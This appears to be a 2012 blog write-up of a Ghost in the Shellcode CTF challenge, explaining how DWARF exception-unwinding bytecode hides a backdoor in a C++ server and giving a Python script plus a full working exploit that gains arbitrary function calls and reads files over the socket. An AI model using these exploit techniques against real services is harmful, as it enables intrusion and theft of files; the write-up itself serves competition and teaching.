30
Jan
2012

GitS 2012 Finals – Khazad (Pwn600)

(Note: we did not solve this challenge in time, but I still decided to do a writeup because it’s such a cool challenge!)

This challenge consisted of a server binary which was written in C++. The use of C++ was pretty limited though, in fact after reversing it seemed that only the C++ exception mechanism was used. Of course this made us pretty suspicious, and we looked into interaction of C++ exceptions with the C setjmp/longjmp functions early on. The true ‘bug’ turned out to be much stranger, however…

After reversing the binary it turned out it was a simple server which allowed you to store blobs of data and later retrieve them. You send four quadwords to the server. The first is a function identifier, the second must be 0xDEAD1337BEEF, and the last two are function arguments.

The function identifiers you send to the server are actually function pointers, and the handles it gives you for your submitted data are actually pointers. However, it is not possible to call arbitrary functions, since the function identifier is checked against a list of allowed values. It is also not possible to call free() on arbitrary addresses, since it checks that the passed value is in a linked list.

What is possible is to read arbitrary memory, since the “get data” function does not check its argument against the linked list. We thoroughly checked the program for bugs in the linking/unlinking of chunks, integer overflows in the data size etc. looking for a way to do a controlled write. This turned up nothing however.

In the end the only slightly suspicious thing we found was in the code that checked whether you were allowed to call a function ([rsp+0x70] is the function pointer we sent to the server):

          401eed: mov rax, [rsp+0x70]
          401ef2: test rax, rax
          401ef5: jz call_previous_function
          401efb: cmp rax, [0x6031a0]
          401f02: mov r12, rax
          401f05: je do_call
          401f0b: cmp rax, [0x6031a8]
          401f12: je do_call
          401f14: cmp rax, [0x6031b0]
          401f1b: je do_call
          401f1d: xor r12d, r12d
          401f20: cmp rax, [0x6031b8]
          401f27: jz load_r12_and_do_call

invalid_function:
          ; ( CODE THAT THROWS AN "INVALID FUNCTION" EXCEPTION GOES HERE )

load_r12_and_do_call:
          401f85: mov r12, rax
          401f88: jmp do_call
...
do_call:
          401f90: mov edx, [rsp+0x14]
          401f94: mov rsi, [rsp+0x58]
          401f99: mov rdi, [rsp+0x60]
          401f9e: call r12
          401fa1: jmp 0x401e70
...
call_previous_function:
          401fb0: test r12, r12
          401fb3: jnz do_call
...
          401fb8: jmp invalid_function

There are two odd things about this code. First, the four valid function addresses are loaded from memory instead of using an immediate operand. This means that if we can do an arbitrary write somewhere we can change the list of allowed functions. Second, it seems this code has some functionality to re-call the previous used function if the function pointer you pass is NULL. This seems odd, and is probably an indication that we should look more closely at this.

Looking for ways to modify r12 between two calls didn’t really turn anything up; subroutines may change r12 but they always restore it before returning. The exception handlers presumably do something similar, otherwise your program would stop working after you catch an exception.

We hit a dead end here and turned to fuzzing: sending lots of arbitrary parameters to the server and hoping it crashes somewhere. We made sure to put NULL in the list of functions to try in our fuzzer, and this quickly gave us a crash at address 0x401f9e, which is where the function you selected gets called. So apparently it is possible to corrupt r12 after all!

The value looked pretty strange however. After a while it became clear that it only crashed when you called the QUIT function before calling a NULL function, and that the address it tried to call depended only on the first parameter of the QUIT function. This parameter is supposedly the exit code of the process, but if you try to pass anything other than 0 you get an exception. Of course this is also highly suspicious!

At this point we had already wasted a LOT of time reversing the binary, but this was the final clue we needed to understand what was going on here. At PH Neutral last year I saw the excellent talk “Exploiting the hard-working dwarf” by James Oakley and Sergey Bratus, which described the arcane and intricate workings of the C++ exception stack unwinding code, and showed how to execute very complex operations during an exception as a way to subvert or backdoor the binary. Apparently the person who wrote this challenge also saw this talk, probably at the previous Shmoocon πŸ™‚

At this point the meaning of the challenge name also became clear, as Khazad means “Dwarf” in the language of the Dwarves from the Lord of the Rings series. In retrospect I should have figured this out much sooner. I’ve said it before, but I’ll repeat it again: we really should learn to google the f*ck out of challenge names.

Anyway, running “readelf –debug-dump=frames 5faa7969ec6113e73f002c861f5b1229” on the program gives the exception handling metadata for this program. It’s immediately clear that something very strange is going on, and that this is probably the source of the strange values for r12 at the moment of the crash.

Here is the data for the QUIT function, the only function we managed to get a corrupted r12 out of:

00000280 0000002c 000000d4 FDE cie=000001b0 pc=00401c70..00401d70
  Augmentation data:     cc 2b 40 00

  DW_CFA_def_cfa_offset: 64
  DW_CFA_offset: r6 (rbp) at cfa-32
  DW_CFA_offset: r12 (r12) at cfa-24
  DW_CFA_offset: r13 (r13) at cfa-16
  DW_CFA_offset: r3 (rbx) at cfa-40
  DW_CFA_val_expression: r12 (r12) (DW_OP_reg3 (rbx); DW_OP_const8u: 1651338292 1683508844; DW_OP_xor; DW_OP_skip: -595)

The DW_CFA_val_expression line specifies that a bytecode program should be run to determine the value of r12 after an exception is thrown in this function. This bytecode appears at a glance to xor the rbx register with some constant. That is good, because at the point the exception is thrown rbx contains the first parameter we passed to the QUIT function. But then it executes a DW_OP_skip instruction. What does this do? We can find the answer in the documentation of the dwarfutils package:

DW_OP_skip is an unconditional branch. Its single operand is a 2-byte signed
integer constant. The 2-byte constant is the number of bytes of the location
expression to skip from the current operation, beginning after the 2-byte 
constant.

So this is a jump instruction. But where does it jump? Certainly the expression cannot be 595 bytes long, so this jumps somewhere out of this record entirely! Looking at the other metadata records we get a suspicion as to what is going on:

00000038 00000034 0000003c FDE cie=00000000 pc=004013f0..00401482
  DW_CFA_def_cfa_offset: 80
  DW_CFA_offset: r14 (r14) at cfa-24
  DW_CFA_offset: r15 (r15) at cfa-16
  DW_CFA_offset: r13 (r13) at cfa-32
  DW_CFA_offset: r12 (r12) at cfa-40
  DW_CFA_offset: r6 (rbp) at cfa-48
  DW_CFA_offset: r3 (rbx) at cfa-56
  DW_CFA_val_expression: r0 (rax) (DW_OP_skip: 19; DW_OP_dup; DW_OP_lit21; DW_OP_shl; DW_OP_swap; DW_OP_const1u: 43; DW_OP_shr; DW_OP_or; DW_OP_constu: 466682695468; DW_OP_dup; DW_OP_skip: 81)

This specifies that the value of rax should be determined by a bytecode program. This seems odd because rax is one of the registers which changes most often, why should its value be restored when the value of many other registers is not? Also the program starts with a jump of 19 bytes. This program is quite short, it seems likely that this jump skips over all of the other instructions! Furthermore, this program ends in another jump which goes somewhere out of bounds.

There are a bunch of other similar lines. My theory is that these are really all part of the bytecode which calculates the new value of r12, and each chunk jumps three bytes into another expression. So all the bytecode chunks are executed sequentially when an exception occurs in the QUIT function, but when an exception is triggered in one of the other code ranges the jump at the start of these expressions will jump straight to the end of the expression, and the expression is ignored.

I decided to dump the eh_frame section and check that the jumps follow this pattern exactly, because the challenge author obviously likes screwing with our heads πŸ™‚

from subprocess import check_output, check_call
from struct import pack, unpack
import re

# the offset of the end of the real r12 expression in the metadata. assuming the bytecode
# interpreter will stop once it reaches this position.
endpos = 0x2b0 

# read the eh_frame section (offset and size read from readelf output)
with open('5faa7969ec6113e73f002c861f5b1229') as f:
	f.seek(0x27c0)
	eh_frame = f.read(0x38c)

# readelf only shows start and length of each block, and in which block each expression is located
# create mapping of address ranges to expressions
blocks = []
txt = check_output('readelf --debug-dump=frames 5faa7969ec6113e73f002c861f5b1229', shell=True)
for l in txt.splitlines():
	if l.startswith("0") and "ZERO terminator" not in l:
		l = l.split()
		blockstart = int(l[0],16)
		blockend = blockstart + int(l[1],16) + 4
	elif "DW_CFA_val_expression" in l:
		blocks.append((xrange(blockstart, blockend), l))

# create a list of all the jump deltas readelf found, so we can match it up with the binary
skips = [int(m.group(1)) for m in re.finditer("DW_OP_skip: ([0-9-]+)", txt)]

# find all possible skip opcodes in the binary, and create a mapping from source to dest offset
skipdest = {}
start = None
for m in re.finditer("\x2f(..)", eh_frame): # dwarf.h: "#define DW_OP_skip 0x2f"
	ofs = m.start()
	delta = unpack("h", m.group(1))[0]
	dest = ofs + delta + 3
	if delta in skips:
		skipdest[ofs] = dest
		print "Found DW_OP_skip %d at 0x%x, jumps to 0x%x" % (delta, ofs, dest)
		# detect the jump at the end of the first block
		if delta == -595:
			# store the location it jumps to for the scavenger hunt in the next loop
			firstjump = m.start()

# print first expression 
for r,e in blocks: 
	if firstjump in r: print e
chunkstart = skipdest[firstjump]
print "Jump to code at 0x%x" % chunkstart

# we noticed that the other chunks seem to be jumped over by a jump which comes just before it
# keep following the jumps while this pattern holds
while chunkstart - 3 in skipdest:
	print "This chunk starts at 0x%x" % chunkstart
	chunkend = skipdest[chunkstart-3]
	print "There is a jump to 0x%x just before this chunk, that's the end of this chunk" % chunkend
	while eh_frame[chunkend-1] == '\x96': chunkend -= 1
	chunk = eh_frame[chunkstart:chunkend]
	for r,e in blocks: 
		if chunkstart in r: print e	
	if chunkend - 3 in skipdest:
		chunkstart = skipdest[chunkend-3]
		if chunkstart == endpos:
			print "Journey completed :)"
			break
		print "Chunk ends in a jump to 0x%x, next chunk starts there" % chunkstart

That turned out a bit uglier than intended, but it does the job. Output:

Found DW_OP_skip 19 at 0x5a, jumps to 0x70
Found DW_OP_skip 81 at 0x6d, jumps to 0xc1
Found DW_OP_skip 15 at 0x8e, jumps to 0xa0
Found DW_OP_skip 572 at 0x9b, jumps to 0x2da
Found DW_OP_skip 15 at 0xbe, jumps to 0xd0
Found DW_OP_skip -62 at 0xcc, jumps to 0x91
Found DW_OP_skip -595 at 0x2ad, jumps to 0x5d
Found DW_OP_skip 14 at 0x2d7, jumps to 0x2e8
Found DW_OP_skip 61 at 0x2e5, jumps to 0x325
Found DW_OP_skip 11 at 0x322, jumps to 0x330
Found DW_OP_skip -128 at 0x32d, jumps to 0x2b0
  DW_CFA_val_expression: r12 (r12) (DW_OP_reg3 (rbx); DW_OP_const8u: 1651338292 1683508844; DW_OP_xor; DW_OP_skip: -595)
Jump to code at 0x5d
This chunk starts at 0x5d
There is a jump to 0x70 just before this chunk, that's the end of this chunk
  DW_CFA_val_expression: r0 (rax) (DW_OP_skip: 19; DW_OP_dup; DW_OP_lit21; DW_OP_shl; DW_OP_swap; DW_OP_const1u: 43; DW_OP_shr; DW_OP_or; DW_OP_constu: 466682695468; DW_OP_dup; DW_OP_skip: 81)
Chunk ends in a jump to 0xc1, next chunk starts there
This chunk starts at 0xc1
There is a jump to 0xd0 just before this chunk, that's the end of this chunk
  DW_CFA_val_expression: r0 (rax) (DW_OP_skip: 15; DW_OP_rot; DW_OP_plus; DW_OP_dup; DW_OP_lit15; DW_OP_shl; DW_OP_swap; DW_OP_const1u: 49; DW_OP_shr; DW_OP_or; DW_OP_plus; DW_OP_skip: -62; DW_OP_nop)
Chunk ends in a jump to 0x91, next chunk starts there
This chunk starts at 0x91
There is a jump to 0xa0 just before this chunk, that's the end of this chunk
  DW_CFA_val_expression: r0 (rax) (DW_OP_skip: 15; DW_OP_const8u: 4294967295 4294938623; DW_OP_and; DW_OP_skip: 572; DW_OP_nop; DW_OP_nop)
Chunk ends in a jump to 0x2da, next chunk starts there
This chunk starts at 0x2da
There is a jump to 0x2e8 just before this chunk, that's the end of this chunk
  DW_CFA_val_expression: r0 (rax) (DW_OP_skip: 14; DW_OP_not; DW_OP_const8u: 1355922643 2123279278; DW_OP_plus; DW_OP_skip: 61)
Chunk ends in a jump to 0x325, next chunk starts there
This chunk starts at 0x325
There is a jump to 0x330 just before this chunk, that's the end of this chunk
  DW_CFA_val_expression: r0 (rax) (DW_OP_skip: 11; DW_OP_dup; DW_OP_lit5; DW_OP_shl; DW_OP_swap; DW_OP_const1u: 59; DW_OP_shr; DW_OP_or; DW_OP_skip: -128)
Journey completed πŸ™‚

This works out quite neatly, following the jumps around hits every bit of suspicious bytecode exactly once and ends up exactly at the end of the original expression for r12.

This should allow us to write a function that calculates the value of r12 from the input we give in rbx.

After a lot of cursing and wondering why my code didn’t work, I found out an interesting detail: the bytecode interpreter didn’t stop when the offset is equal to the end of the original expression, but when it is equal to OR GREATER THAN the original expression. Changing this snippet:

		if chunkstart == endpos:
			print "Journey completed :)"

To this:

		if chunkstart >= endpos:
			print "Journey completed :)"

Gives the correct output, showing that the last two chunks of bytecode will never be executed:

  DW_CFA_val_expression: r12 (r12) (DW_OP_reg3 (rbx); DW_OP_const8u: 1651338292 1683508844; DW_OP_xor; DW_OP_skip: -595)
Jump to code at 0x5d
This chunk starts at 0x5d
There is a jump to 0x70 just before this chunk, that's the end of this chunk
  DW_CFA_val_expression: r0 (rax) (DW_OP_skip: 19; DW_OP_dup; DW_OP_lit21; DW_OP_shl; DW_OP_swap; DW_OP_const1u: 43; DW_OP_shr; DW_OP_or; DW_OP_constu: 466682695468; DW_OP_dup; DW_OP_skip: 81)
Chunk ends in a jump to 0xc1, next chunk starts there
This chunk starts at 0xc1
There is a jump to 0xd0 just before this chunk, that's the end of this chunk
  DW_CFA_val_expression: r0 (rax) (DW_OP_skip: 15; DW_OP_rot; DW_OP_plus; DW_OP_dup; DW_OP_lit15; DW_OP_shl; DW_OP_swap; DW_OP_const1u: 49; DW_OP_shr; DW_OP_or; DW_OP_plus; DW_OP_skip: -62; DW_OP_nop)
Chunk ends in a jump to 0x91, next chunk starts there
This chunk starts at 0x91
There is a jump to 0xa0 just before this chunk, that's the end of this chunk
  DW_CFA_val_expression: r0 (rax) (DW_OP_skip: 15; DW_OP_const8u: 4294967295 4294938623; DW_OP_and; DW_OP_skip: 572; DW_OP_nop; DW_OP_nop)
Journey completed πŸ™‚

Writing out the program shows that it is quite simple:

tmp = rbx ^ 0x64584e6c626d6c34
tmp = rotate_left(tmp, 21)
tmp = tmp + 0x6ca874cf2c
tmp = rotate_left(tmp, 15)
tmp = tmp + 0x6ca874cf2c
tmp = tmp & 0xffff8fffffffffff
#tmp = tmp ^ 0xffffffffffffffff
#tmp = tmp + 0x7e8eabae50d1bcd3
#tmp = rotate_left(tmp, 5)
r12 = tmp

The rotate_left function simply rotates the first argument by the specified number of bits. The commented out lines represent the bytecode chunks which are never executed πŸ™‚

So now we can write a function which does an (almost) arbitrary function call:


def callfunc(ptr, arg1, arg2):
	assert (ptr & 0xffff8fffffffffff == ptr)
	tmp = ptr
	tmp = (tmp - 0x6ca874cf2c) & 0xffffffffffffffff
	tmp = rotate_left(tmp, 64 - 15)
	tmp = (tmp - 0x6ca874cf2c) & 0xffffffffffffffff
	tmp = rotate_left(tmp, 64 - 21)
	tmp = tmp ^ 0x64584e6c626d6c34
	call(FUNC_QUIT, tmp, 0)
	call(0, arg1, arg2)	

(The additional “& 0xffffffffffffffff” operations are to limit the result to 64 bits, since python supports arbitrary length integers.)

Note the assert at the top: this checks that some of the bits of the pointer we want are not masked out by the ‘and’ at the end of the calculation. As it turns out, this makes it impossible to call libc function directly, as all the libraries are mapped at quite high addresses. We can still call any function in the program though, with the first two arguments under our full control!

Looking back at the disassembly at the top of this writeup, we can see that the third argument is also known: it is the file descriptor number of the socket. With this knowledge we could call the function read_all(fd, buffer, amount) in the program to do a write of arbitrary data to an arbitrary address. The amount of data read is equal to the file descriptor number of the socket. We can use this to overwrite the array of allowed functions with some other data, which would allow us to call libc functions.

In the below exploit I decided to simply use functions in the program to open and read an arbitrary file however. This should be enough to get the key,

#!/usr/bin/python
import socket, struct, sys, time

# the four functions we're allowed to call normally
FUNC_GET = 0x401B70
FUNC_STORE = 0x402170
FUNC_DEL = 0x401980
FUNC_QUIT = 0x401C70

# some other interesting functions in the program or the imports
SEND_ALL = 0x401500
RECV_ALL = 0x401490
RECV_UNTIL = 0x4013f0
OPEN = 0x4012d0
READ = 0x401090
CLOSE = 0x401050

def qword(w): return struct.pack('Q0', w)
def deqword(w):	return struct.unpack('Q0', w)[0]
def call(f, a1, a2): s.send(struct.pack("QQQQ", f, 0xDEAD1337BEEF, a1, a2))

#s = socket.create_connection(('khazad.final2012.ghostintheshellcode.com', 9999))
s = socket.create_connection(('localhost', 9999))

def memstore(data):
	call(FUNC_STORE, len(data), 0)
	s.send(data)
	return deqword(s.recv(9)[:8]) + 0x20

def memfree(ptr):
	call(FUNC_DEL, ptr - 0x20, 0x0)
	s.recv(7)

def memread(addr, size):
	call(FUNC_GET, addr - 0x20, size)
	return s.recv(size+1)[:size]

def rotl(a,b): return ((a << b) | (a >> (64 - b))) & 0xffffffffffffffff

def callfunc(ptr, arg1, arg2):
	
	# set the second argument to QUIT to something recogniseable and unique so 
	# we can detect the end of the error message it sends after the invalid QUIT
	mymagic = 0x5c9351812062dd01

	assert (ptr & 0xffff8fffffffffff == ptr)
	tmp = ptr
	tmp = (tmp - 0x6ca874cf2c) & 0xffffffffffffffff
	tmp = rotl(tmp, 64 - 15)
	tmp = (tmp - 0x6ca874cf2c) & 0xffffffffffffffff
	tmp = rotl(tmp, 64 - 21)
	tmp = tmp ^ 0x64584e6c626d6c34
	call(FUNC_QUIT, tmp, mymagic)
	tmp = ''
	while not tmp.endswith("%x" % mymagic): tmp += s.recv(1024)
	call(0, arg1, arg2)	
	return tmp

print "[+] Determining file descriptor number"

# call send_all with a bunch of possible file descriptors.
# the function call passes the real file descriptor as the third param, which for send_all 
# is the length parameter. so we can tell the file descriptor number by the number of 
# consecutive '^' characters we get back.
maxfd = 20
addr = memstore("^" * maxfd) 
fdnr = None
for i in range(maxfd):
	tmp = callfunc(SEND_ALL, i, addr) 
	if "^" in tmp: 
		fdnr = tmp.count("^")
		break

print "[+] Socket is file descriptor %d, so I can read in chunks of %d" % (fdnr, fdnr)

def read_file(filename):
	print "[+] Reading file %r:" % filename
	fnbuf = memstore(filename)
	bufsize = fdnr
	callfunc(CLOSE, 0, 0) # close fd 0, so we know our file will be fd 0
	callfunc(OPEN, fnbuf, 0)
	data = ""
	buf = memstore("\0" * bufsize)
	tmp = ''
	while True:	
		callfunc(READ, 0, buf)
		tmp = memread(buf, bufsize)
		callfunc(RECV_ALL, fdnr, buf)
		s.send("\0" * bufsize)
		tmp = tmp.split("\0")[0]
		sys.stdout.write(tmp)
		sys.stdout.flush()
		data += tmp
		if len(tmp) != bufsize: break
	memfree(buf)
	memfree(fnbuf)

read_file("/proc/self/maps")

As mentioned at the top, we did not complete this challenge in time. I’m told the key was in the file “./key” however, so this should have worked πŸ™‚

If you want a happy ending you should take a look at the writeup by oxff, who did complete the challenge in time. Kudos!

{One Response to “GitS 2012 Finals – Khazad (Pwn600)”}

  1. Nice writeup! Glad you enjoyed it. Lightning built this challenge and he really did an amazing job. He found some great quirks to abuse there. None of the existing Dwarf tools can handle it. It’s always fun when you can force someone to write some new code to solve a challenge. πŸ™‚

    Very clean exploit code, that’s a much better version than we came up with for Q/A of the challenge. Also, thanks for the shellcode bribe — very fun stuff, sorry we had such trouble sending you your reward. For the record, the two “sample” keys in the image would have gotten you two more bonus points, and if you were able to solve the other hidden challenge on that page, it would have put you over the top of PPP with 100 bonus points (well, it would have until they solved the additional challenge they got at the last minute, but oh well).

    Next time we’ll probably qualify that bribes can only come on the first or second day — it’s too hard for us to decide the amount of points a bribe should be worth at the end when it’s obvious how many points could directly impact the outcome game. Didn’t want it to be unfair for either you or them, so sending you a copy of the program and thus opening you up to the three bonus challenges in there was our compromise.

    Also, not sure which presentation we first heard about Dwarf at, but it was really their presentation at Usenix Woot this year that reminded me again about it. I can assure you though, we didn’t go to the talk at ShmooCon last year — we’re too busy running the CTF to go to any talks except ones we’re doing!

    Jordan